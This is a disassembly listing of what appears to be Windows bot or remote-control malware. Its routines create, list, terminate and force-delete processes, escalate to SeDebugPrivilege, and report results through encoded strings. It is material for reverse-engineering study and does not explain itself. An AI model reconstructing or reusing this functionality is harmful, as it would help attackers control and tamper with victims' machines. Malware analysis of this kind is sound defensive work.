mov [ebp+arg_0], eax
mov eax, [ebp+var_44]
mov [ebp+var_18], eax
lea eax, [ebp+var_29C]
push eax
call dword_4370A4 ; lstrcpyA
lea eax, [ebp+var_29C]
push 104h
push eax
lea eax, [ebp+var_418]
push eax
call sub_429C40
add esp, 0Ch
lea eax, [ebp+var_418]
push eax
call dword_456E8C ; PathRemoveFileSpecA
test eax, eax
jnz short loc_41F541
cmp [ebp+var_28], eax
mov ebx, dword_43716C
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
jnz short loc_41F516
cmp [ebp+var_24], eax
jnz short loc_41F520
call ebx ; dword_43716C
push eax
push edi
push esi
lea eax, [ebp+var_D8]
push offset aSCouldnTPars_0 ; "%s Couldn't parse path, %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 18h
loc_41F516: ; CODE XREF: sub_41F46D+86�j
cmp [ebp+var_24], 0
jz loc_41F61B
loc_41F520: ; CODE XREF: sub_41F46D+8B�j
call ebx ; dword_43716C
push eax
push edi
push esi
lea eax, [ebp+var_D8]
push offset aSCouldnTPars_0 ; "%s Couldn't parse path, %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
jmp loc_41F61B
; ---------------------------------------------------------------------------
loc_41F541: ; CODE XREF: sub_41F46D+71�j
xor ebx, ebx
push 44h
lea eax, [ebp+var_120]
push ebx
push eax
call sub_429690
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_429690
add esp, 18h
lea eax, [ebp+var_14]
neg esi
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_418]
push eax
push ebx
sbb esi, esi
push ebx
push ebx
and esi, 0FFFFFFFBh
push ebx
lea eax, [ebp+var_29C]
push ebx
add esi, 5
push eax
push ebx
mov [ebp+var_120], 44h
mov [ebp+var_F4], edi
mov [ebp+var_F0], si
call dword_437188 ; CreateProcessA
test eax, eax
jnz short loc_41F623
cmp [ebp+var_28], ebx
mov ebx, dword_43716C
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
jnz short loc_41F5ED
cmp [ebp+var_24], eax
jnz short loc_41F5F3
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_29C]
push edi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push esi
lea eax, [ebp+var_D8]
push offset aSSToCreatePr_0 ; "%s %s to create proc: \"%s\", %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
loc_41F5ED: ; CODE XREF: sub_41F46D+151�j
cmp [ebp+var_24], 0
jz short loc_41F61B
loc_41F5F3: ; CODE XREF: sub_41F46D+156�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_29C]
push edi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push esi
lea eax, [ebp+var_D8]
push offset aSSToCreatePr_0 ; "%s %s to create proc: \"%s\", %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 20h
loc_41F61B: ; CODE XREF: sub_41F46D+AD�j
; sub_41F46D+CF�j ...
xor eax, eax
inc eax
jmp loc_41F7A9
; ---------------------------------------------------------------------------
loc_41F623: ; CODE XREF: sub_41F46D+13C�j
mov edi, dword_437184
call edi ; dword_437184
cmp [ebp+var_28], 0
mov [ebp+var_4], eax
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov ebx, offset aSCreatedProcSP ; "%s Created proc: \"%s\", PID: <%d>"
jnz short loc_41F662
cmp [ebp+var_24], 0
jnz short loc_41F668
push [ebp+var_C]
lea eax, [ebp+var_29C]
push eax
push esi
lea eax, [ebp+var_D8]
push ebx
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 18h
loc_41F662: ; CODE XREF: sub_41F46D+1CF�j
cmp [ebp+var_24], 0
jz short loc_41F686
loc_41F668: ; CODE XREF: sub_41F46D+1D5�j
push [ebp+var_C]
lea eax, [ebp+var_29C]
push eax
push esi
lea eax, [ebp+var_D8]
push ebx
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_41F686: ; CODE XREF: sub_41F46D+1F9�j
cmp [ebp+var_28], 0
jnz loc_41F782
cmp [ebp+var_18], 0
jz loc_41F782
push 0FFFFFFFFh
push [ebp+var_14]
call dword_43707C ; WaitForSingleObject
call edi ; dword_437184
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
pop edi
and [ebp+var_198], 0
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, dword_437090
test ecx, ecx
mov ebx, edx
mov [ebp+var_4], eax
jbe short loc_41F71D
cmp ecx, 1
mov eax, offset aHour ; " hour"
jz short loc_41F6F7
mov eax, offset aHours ; " hours"
loc_41F6F7: ; CODE XREF: sub_41F46D+283�j
push eax
push ecx
lea eax, [ebp+var_314]
push offset aDS ; " %d%s"
push eax
call sub_429A33
add esp, 10h
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_198]
push eax
call edi ; dword_437090
loc_41F71D: ; CODE XREF: sub_41F46D+279�j
push ebx
lea eax, [ebp+var_314]
push [ebp+var_4]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call sub_429A33
add esp, 10h
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_198]
push eax
call edi ; dword_437090
lea eax, [ebp+var_198]
cmp [ebp+var_24], 0
push eax
lea eax, [ebp+var_29C]
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
lea eax, [ebp+var_D8]
push esi
push offset aSProcsSSTotalS ; "%s Procs %s: \"%s\", Total %s Time: %s."
push eax
push [ebp+arg_0]
jnz short loc_41F77A
call sub_41CD84
jmp short loc_41F77F
; ---------------------------------------------------------------------------
loc_41F77A: ; CODE XREF: sub_41F46D+304�j
call sub_41CD0E
loc_41F77F: ; CODE XREF: sub_41F46D+30B�j
add esp, 20h
loc_41F782: ; CODE XREF: sub_41F46D+21D�j
; sub_41F46D+227�j
cmp [ebp+var_14], 0
mov esi, dword_437044
jz short loc_41F793
push [ebp+var_14]
call esi ; dword_437044
loc_41F793: ; CODE XREF: sub_41F46D+31F�j
cmp [ebp+var_10], 0
jz short loc_41F79E
push [ebp+var_10]
call esi ; dword_437044
loc_41F79E: ; CODE XREF: sub_41F46D+32A�j
push [ebp+var_58]
call sub_42355A
pop ecx
xor eax, eax
loc_41F7A9: ; CODE XREF: sub_41F46D+1B1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_41F46D endp
; =============== S U B R O U T I N E =======================================
sub_41F7B0 proc near ; DATA XREF: sub_40A938+1FD6�o
mov eax, offset loc_436584
call sub_42B6FC
mov eax, 2AF8h
call sub_429A90
mov eax, [ebp+8]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp-0E0h]
rep movsd
mov edi, [ebp-0E0h]
xor esi, esi
xor ebx, ebx
inc esi
cmp [ebp-4Ch], ebx
mov [eax+0BCh], esi
mov [ebp+8], edi
jz loc_41F97A
mov al, [ebp+0Bh]
push ebx
push ebx
lea ecx, [ebp-1Ch]
mov [ebp-1Ch], al
call sub_42021D
mov [ebp-18h], eax
mov [ebp-14h], ebx
push dword ptr [ebp-54h]
lea eax, [ebp-1Ch]
mov [ebp-4], ebx
push eax
call sub_41FB92
pop ecx
test al, al
pop ecx
jz loc_41F919
cmp [ebp-28h], ebx
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp-0DCh]
push esi
push offset aSProcsList ; "%s Procs List:"
push eax
push edi
jnz short loc_41F842
call sub_41CD84
jmp short loc_41F847
; ---------------------------------------------------------------------------
loc_41F842: ; CODE XREF: sub_41F7B0+89�j
call sub_41CD0E
loc_41F847: ; CODE XREF: sub_41F7B0+90�j
add esp, 10h
cmp [ebp-30h], ebx
mov edi, offset aPidAMemoryUsag ; " PID - Memory Usage - Process"
jz short loc_41F86C
cmp [ebp-28h], ebx
jnz short loc_41F871
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD84
add esp, 0Ch
loc_41F86C: ; CODE XREF: sub_41F7B0+A2�j
cmp [ebp-28h], ebx
jz short loc_41F884
loc_41F871: ; CODE XREF: sub_41F7B0+A7�j
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD0E
add esp, 0Ch
loc_41F884: ; CODE XREF: sub_41F7B0+BF�j
mov eax, [ebp-18h]
mov edi, [eax]
cmp edi, eax
jz short loc_41F8F3
loc_41F88D: ; CODE XREF: sub_41F7B0+13F�j
mov eax, [edi+108h]
lea ebx, [edi+10Ch]
push offset aK ; " K"
push ebx
mov [ebp-10h], eax
call dword_437090 ; lstrcatA
lea eax, [edi+8]
push eax
push ebx
push dword ptr [ebp-10h]
lea eax, [ebp-2B04h]
push offset a6d10sS ; " %-6d- %-10s- \"%s\""
push eax
call sub_429A33
add esp, 14h
cmp dword ptr [ebp-28h], 0
lea eax, [ebp-2B04h]
push eax
lea eax, [ebp-0DCh]
push eax
push dword ptr [ebp+8]
jnz short loc_41F8E2
call sub_41CD84
jmp short loc_41F8E7
; ---------------------------------------------------------------------------
loc_41F8E2: ; CODE XREF: sub_41F7B0+129�j
call sub_41CD0E
loc_41F8E7: ; CODE XREF: sub_41F7B0+130�j
mov edi, [edi]
add esp, 0Ch
cmp edi, [ebp-18h]
jnz short loc_41F88D
xor ebx, ebx
loc_41F8F3: ; CODE XREF: sub_41F7B0+DB�j
cmp [ebp-28h], ebx
lea eax, [ebp-0DCh]
push esi
push offset aSEndOfList ; "%s End of list"
push eax
push dword ptr [ebp+8]
jnz short loc_41F912
call sub_41CD84
loc_41F90D: ; CODE XREF: sub_41F7B0+167�j
add esp, 10h
jmp short loc_41F969
; ---------------------------------------------------------------------------
loc_41F912: ; CODE XREF: sub_41F7B0+156�j
call sub_41CD0E
jmp short loc_41F90D
; ---------------------------------------------------------------------------
loc_41F919: ; CODE XREF: sub_41F7B0+6D�j
cmp [ebp-28h], ebx
jnz short loc_41F943
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp-0DCh]
push offset aSUnableToListP ; "%s Unable to list procs, %s: <%d>"
push eax
push edi
call sub_41CD84
jmp short loc_41F966
; ---------------------------------------------------------------------------
loc_41F943: ; CODE XREF: sub_41F7B0+16C�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp-0DCh]
push offset aSUnableToListP ; "%s Unable to list procs, %s: <%d>"
push eax
push edi
call sub_41CD0E
loc_41F966: ; CODE XREF: sub_41F7B0+191�j
add esp, 18h
loc_41F969: ; CODE XREF: sub_41F7B0+160�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-1Ch]
call sub_42017F
jmp loc_41FB67
; ---------------------------------------------------------------------------
loc_41F97A: ; CODE XREF: sub_41F7B0+3E�j
cmp [ebp-48h], ebx
jz loc_41FB67
cmp [ebp-44h], ebx
jnz loc_41FA62
lea eax, [ebp-0F0h]
push eax
push dword ptr [ebp-58h]
call sub_41FD79
pop ecx
test al, al
pop ecx
jz short loc_41F9E8
cmp [ebp-2Ch], ebx
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov edi, offset aSProSKilledTot ; "%s Pro \"%s\" killed,total: <%s>"
jnz short loc_41F9D3
cmp [ebp-28h], ebx
jnz short loc_41F9DC
lea eax, [ebp-0F0h]
push eax
lea eax, [ebp-0DCh]
push dword ptr [ebp-58h]
push esi
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD84
add esp, 18h
loc_41F9D3: ; CODE XREF: sub_41F7B0+1FE�j
cmp [ebp-28h], ebx
jz loc_41FB67
loc_41F9DC: ; CODE XREF: sub_41F7B0+203�j
lea eax, [ebp-0F0h]
push eax
push dword ptr [ebp-58h]
jmp short loc_41FA3F
; ---------------------------------------------------------------------------
loc_41F9E8: ; CODE XREF: sub_41F7B0+1EF�j
push dword ptr [ebp-58h]
call sub_42A030
push eax
call sub_42003F
pop ecx
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
test eax, eax
pop ecx
jz short loc_41FA58
mov edi, offset aSPidIKilled ; "%s PID \"%i\" killed"
loc_41FA06: ; CODE XREF: sub_41F7B0+3DD�j
cmp [ebp-2Ch], ebx
jnz short loc_41FA2D
cmp [ebp-28h], ebx
jnz short loc_41FA36
push dword ptr [ebp-58h]
call sub_42A030
push eax
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD84
add esp, 18h
loc_41FA2D: ; CODE XREF: sub_41F7B0+259�j
cmp [ebp-28h], ebx
jz loc_41FB67
loc_41FA36: ; CODE XREF: sub_41F7B0+25E�j
push dword ptr [ebp-58h]
call sub_42A030
push eax
loc_41FA3F: ; CODE XREF: sub_41F7B0+236�j
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD0E
add esp, 18h
jmp loc_41FB67
; ---------------------------------------------------------------------------
loc_41FA58: ; CODE XREF: sub_41F7B0+24F�j
mov edi, offset aSFailedToKillP ; "%s Failed to kill proc"
jmp loc_41FB30
; ---------------------------------------------------------------------------
loc_41FA62: ; CODE XREF: sub_41F7B0+1D6�j
lea eax, [ebp-1F4h]
push eax
push dword ptr [ebp-58h]
call sub_42A030
pop ecx
push eax
call sub_420094
push eax
lea eax, [ebp-1F4h]
push offset aS_5 ; "%s"
push eax
call sub_429A33
lea eax, [ebp-3F4h]
push eax
lea eax, [ebp-2F4h]
push eax
push ebx
lea eax, [ebp-1F4h]
push ebx
push eax
call sub_42BEC5
add esp, 28h
lea eax, [ebp-3F4h]
push eax
lea eax, [ebp-2F4h]
push eax
call dword_437090 ; lstrcatA
xor edi, edi
mov [ebp-10h], ebx
loc_41FAC2: ; CODE XREF: sub_41F7B0+374�j
push dword ptr [ebp-58h]
call sub_42A030
push eax
call sub_42003F
pop ecx
test eax, eax
pop ecx
jz short loc_41FAD8
mov edi, esi
loc_41FAD8: ; CODE XREF: sub_41F7B0+324�j
lea eax, [ebp-1F4h]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
lea eax, [ebp-1F4h]
push eax
call dword_437060 ; DeleteFileA
test eax, eax
jnz loc_41FB83
cmp edi, ebx
jz short loc_41FB12
lea eax, [ebp-2F4h]
push ebx
push eax
call sub_41FD79
pop ecx
pop ecx
loc_41FB12: ; CODE XREF: sub_41F7B0+351�j
push 3E8h
call dword_43718C ; Sleep
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-10h], 5
jl short loc_41FAC2
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov edi, offset aSFailedToKillA ; "%s Failed to kill and erase proc"
loc_41FB30: ; CODE XREF: sub_41F7B0+2AD�j
cmp [ebp-2Ch], ebx
jnz short loc_41FB4E
cmp [ebp-28h], ebx
jnz short loc_41FB53
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD84
add esp, 10h
loc_41FB4E: ; CODE XREF: sub_41F7B0+383�j
cmp [ebp-28h], ebx
jz short loc_41FB67
loc_41FB53: ; CODE XREF: sub_41F7B0+388�j
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CD0E
add esp, 10h
loc_41FB67: ; CODE XREF: sub_41F7B0+1C5�j
; sub_41F7B0+1CD�j ...
push dword ptr [ebp-5Ch]
call sub_42355A
pop ecx
pop edi
mov ecx, [ebp-0Ch]
pop esi
xor eax, eax
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41FB83: ; CODE XREF: sub_41F7B0+349�j
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov edi, offset aSPidIKilledAnd ; "%s PID \"%i\" killed and deleted"
jmp loc_41FA06
sub_41F7B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB92 proc near ; CODE XREF: sub_41F7B0+64�p
var_15CC = byte ptr -15CCh
var_5CC = byte ptr -5CCh
var_3CC = byte ptr -3CCh
var_2CC = byte ptr -2CCh
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 15CCh
call sub_429A90
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_15CC]
push 1000h
push eax
call dword_456F10
test eax, eax
jnz short loc_41FBBD
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41FBBD: ; CODE XREF: sub_41FB92+25�j
mov eax, [ebp+var_8]
push edi
shr eax, 2
mov [ebp+var_10], eax
mov eax, dword_4473D8
push 3Fh
mov [ebp+var_148], eax
mov eax, dword_4473DC
pop ecx
push 0
mov [ebp+var_144], eax
pop eax
lea edi, [ebp+var_140]
rep stosd
mov [ebp+var_4], eax
jz loc_41FD74
push ebx
push esi
mov ebx, offset aS_5 ; "%s"
loc_41FBFB: ; CODE XREF: sub_41FB92+1DA�j
mov eax, [ebp+var_4]
lea esi, [ebp+eax*4+var_15CC]
push dword ptr [esi]
push 0
push 410h
call dword_437104 ; OpenProcess
mov edi, eax
test edi, edi
jz loc_41FD63
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push 4
push eax
push edi
call dword_456ECC
test eax, eax
jz loc_41FD5C
lea eax, [ebp+var_148]
push 104h
push eax
push [ebp+var_C]
push edi
call dword_456EC4
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_2CC]
push ebx
push eax
call sub_429A33
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_1CC], eax
lea eax, [ebp+var_44]
push 28h
push eax
push edi
call dword_456F80
test eax, eax
jz short loc_41FCA3
mov eax, [ebp+var_38]
push 0
shr eax, 0Ah
push eax
call sub_427D86
push eax
push ebx
lea eax, [ebp+var_1C8]
push 80h
push eax
call sub_429AEE
add esp, 18h
jmp short loc_41FCC8
; ---------------------------------------------------------------------------
loc_41FCA3: ; CODE XREF: sub_41FB92+E9�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aSD_2 ; "%s: <%d>"
lea eax, [ebp+var_1C8]
push 80h
push eax
call sub_429AEE
add esp, 14h
loc_41FCC8: ; CODE XREF: sub_41FB92+10F�j
xor eax, eax
cmp [ebp+arg_4], eax
jz short loc_41FD45
lea ecx, [ebp+var_3CC]
push ecx
lea ecx, [ebp+var_5CC]
push ecx
push eax
push eax
lea eax, [ebp+var_2CC]
push eax
call sub_42BEC5
add esp, 14h
lea eax, [ebp+var_3CC]
push eax
lea eax, [ebp+var_5CC]
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_5CC]
push eax
push [ebp+arg_4]
push offset aSS_4 ; "%s / %s\n"
push offset dword_450EE0
call sub_42C00C
add esp, 10h
lea eax, [ebp+var_5CC]
push eax
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_41FD5C
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_2CC]
push edx
mov eax, [ecx+4]
push eax
lea eax, [ebp+var_18]
jmp short loc_41FD56
; ---------------------------------------------------------------------------
loc_41FD45: ; CODE XREF: sub_41FB92+13B�j
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_2CC]
push edx
mov eax, [ecx+4]
push eax
lea eax, [ebp+var_14]
loc_41FD56: ; CODE XREF: sub_41FB92+1B1�j
push eax
call sub_4201AA
loc_41FD5C: ; CODE XREF: sub_41FB92+9F�j
; sub_41FB92+19E�j
push edi
call dword_437044 ; CloseHandle
loc_41FD63: ; CODE XREF: sub_41FB92+86�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jb loc_41FBFB
pop esi
pop ebx
loc_41FD74: ; CODE XREF: sub_41FB92+5C�j
mov al, 1
pop edi
leave
retn
sub_41FB92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD79 proc near ; CODE XREF: sub_40A938+3CE�p
; sub_40A938+837F�p ...
var_1148 = dword ptr -1148h
var_148 = byte ptr -148h
var_44 = byte ptr -44h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1148h
call sub_429A90
push ebx
push esi
push 10h
lea eax, [ebp+var_8]
pop esi
xor ebx, ebx
push eax
push ebx
push 28h
mov [ebp+var_1], bl
mov [ebp+var_1C], esi
call dword_437120 ; GetCurrentThread
push eax
call dword_456E28 ; OpenThreadToken
test eax, eax
jnz short loc_41FDC5
lea eax, [ebp+var_8]
push eax
push 28h
call dword_43704C ; GetCurrentProcess
push eax
call dword_456EF8 ; OpenProcessToken
test eax, eax
jnz short loc_41FDC5
mov [ebp+var_8], ebx
loc_41FDC5: ; CODE XREF: sub_41FD79+30�j
; sub_41FD79+47�j
cmp [ebp+var_8], ebx
jz short loc_41FE1C
lea eax, [ebp+var_30]
mov [ebp+var_34], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push ebx
mov [ebp+var_28], 2
call dword_456EBC ; LookupPrivilegeValueA
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_34]
push esi
push eax
push ebx
push [ebp+var_8]
call dword_456F94 ; AdjustTokenPrivileges
test eax, eax
jz short loc_41FE10
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 514h
jnz short loc_41FE1C
loc_41FE10: ; CODE XREF: sub_41FD79+88�j
push [ebp+var_8]
call dword_437044 ; CloseHandle
mov [ebp+var_8], ebx
loc_41FE1C: ; CODE XREF: sub_41FD79+4F�j
; sub_41FD79+95�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1148]
push 1000h
push eax
call dword_456F10
test eax, eax
jnz short loc_41FE3D
xor al, al
jmp loc_41FF72
; ---------------------------------------------------------------------------
loc_41FE3D: ; CODE XREF: sub_41FD79+BB�j
mov esi, [ebp+var_18]
mov [ebp+var_10], ebx
shr esi, 2
mov [ebp+var_24], esi
mov [ebp+var_C], ebx
jz loc_41FF37
push edi
loc_41FE53: ; CODE XREF: sub_41FD79+1B7�j
lea eax, [ebp+var_148]
push offset aUnknown ; "unknown"
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+var_C]
push [ebp+eax*4+var_1148]
push ebx
push 411h
call dword_437104 ; OpenProcess
mov edi, eax
cmp edi, ebx
jz loc_41FF2A
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push 4
push eax
push edi
call dword_456ECC
test eax, eax
jz loc_41FF23
lea eax, [ebp+var_148]
push 104h
push eax
push [ebp+var_20]
push edi
call dword_456E00
lea eax, [ebp+var_148]
mov [ebp+var_14], ebx
push eax
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_41FEF6
mov eax, [ebp+var_C]
lea esi, [ebp+eax+var_148]
loc_41FED2: ; CODE XREF: sub_41FD79+178�j
movsx eax, byte ptr [esi]
push eax
call sub_42C1A8
inc [ebp+var_14]
mov [esi], al
lea eax, [ebp+var_148]
push eax
call sub_4292D0
cmp [ebp+var_14], eax
pop ecx
pop ecx
jb short loc_41FED2
mov esi, [ebp+var_24]
loc_41FEF6: ; CODE XREF: sub_41FD79+14D�j
cmp [ebp+arg_0], ebx
jnz short loc_41FF00
mov [ebp+var_1], bl
jmp short loc_41FF23
; ---------------------------------------------------------------------------
loc_41FF00: ; CODE XREF: sub_41FD79+180�j
push [ebp+arg_0]
lea eax, [ebp+var_148]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_41FF23
inc [ebp+var_10]
push ebx
push edi
call dword_43710C ; TerminateProcess
mov [ebp+var_1], 1
loc_41FF23: ; CODE XREF: sub_41FD79+11F�j
; sub_41FD79+185�j ...
push edi
call dword_437044 ; CloseHandle
loc_41FF2A: ; CODE XREF: sub_41FD79+106�j
inc [ebp+var_C]
cmp [ebp+var_C], esi
jb loc_41FE53
pop edi
loc_41FF37: ; CODE XREF: sub_41FD79+D3�j
cmp [ebp+arg_4], ebx
jz short loc_41FF4F
push [ebp+var_10]
push offset dword_44770C
push [ebp+arg_4]
call sub_429A33
add esp, 0Ch
loc_41FF4F: ; CODE XREF: sub_41FD79+1C1�j
cmp [ebp+var_8], ebx
jz short loc_41FF6F
push ebx
push ebx
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
push [ebp+var_8]
call dword_456F94 ; AdjustTokenPrivileges
push [ebp+var_8]
call dword_437044 ; CloseHandle
loc_41FF6F: ; CODE XREF: sub_41FD79+1D9�j
mov al, [ebp+var_1]
loc_41FF72: ; CODE XREF: sub_41FD79+BF�j
pop esi
pop ebx
leave
retn
sub_41FD79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF76 proc near ; CODE XREF: sub_42003F+12�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
push esi
push edi
push 28h
mov [ebp+var_8], 10h
mov [ebp+var_4], edi
call dword_437120 ; GetCurrentThread
push eax
call dword_456E28 ; OpenThreadToken
test eax, eax
jnz short loc_41FFB9
push esi
push 28h
call dword_43704C ; GetCurrentProcess
push eax
call dword_456EF8 ; OpenProcessToken
test eax, eax
jnz short loc_41FFB9
mov [esi], edi
loc_41FFB9: ; CODE XREF: sub_41FF76+2B�j
; sub_41FF76+3F�j
cmp [esi], edi
jz short loc_420010
lea eax, [ebp+var_14]
xor ebx, ebx
push eax
inc ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
push edi
mov [ebp+var_18], ebx
mov [ebp+var_C], 2
call dword_456EBC ; LookupPrivilegeValueA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push [ebp+arg_4]
push 10h
push eax
push edi
push dword ptr [esi]
call dword_456F94 ; AdjustTokenPrivileges
test eax, eax
jz short loc_420006
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 514h
jz short loc_420006
mov [ebp+var_4], ebx
jmp short loc_420010
; ---------------------------------------------------------------------------
loc_420006: ; CODE XREF: sub_41FF76+7C�j
; sub_41FF76+89�j
push dword ptr [esi]
call dword_437044 ; CloseHandle
mov [esi], edi
loc_420010: ; CODE XREF: sub_41FF76+45�j
; sub_41FF76+8E�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41FF76 endp
; =============== S U B R O U T I N E =======================================
sub_420018 proc near ; CODE XREF: sub_42003F+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor ecx, ecx
mov eax, [esi]
cmp eax, ecx
jz short loc_42003D
push ecx
push ecx
push 10h
push [esp+10h+arg_4]
push ecx
push eax
call dword_456F94 ; AdjustTokenPrivileges
push dword ptr [esi]
call dword_437044 ; CloseHandle
loc_42003D: ; CODE XREF: sub_420018+B�j
pop esi
retn
sub_420018 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42003F proc near ; CODE XREF: sub_41F7B0+241�p
; sub_41F7B0+31B�p ...
var_14 = byte ptr -14h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_4]
loc_42004E: ; DATA XREF: .text:0043BAB8�o
; .text:0043BAC4�o ...
xor ebx, ebx
push eax
call sub_41FF76
pop ecx
pop ecx
push [ebp+arg_0]
push ebx
push 411h
call dword_437104 ; OpenProcess
mov esi, eax
cmp esi, ebx
jz short loc_42007E
push ebx
push esi
call dword_43710C ; TerminateProcess
push esi
mov bl, 1
call dword_437044 ; CloseHandle
loc_42007E: ; CODE XREF: sub_42003F+2C�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_420018
pop ecx
pop ecx
pop esi
movzx eax, bl
pop ebx
leave
retn
sub_42003F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420094 proc near ; CODE XREF: sub_41F7B0+2C3�p
var_1114 = byte ptr -1114h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
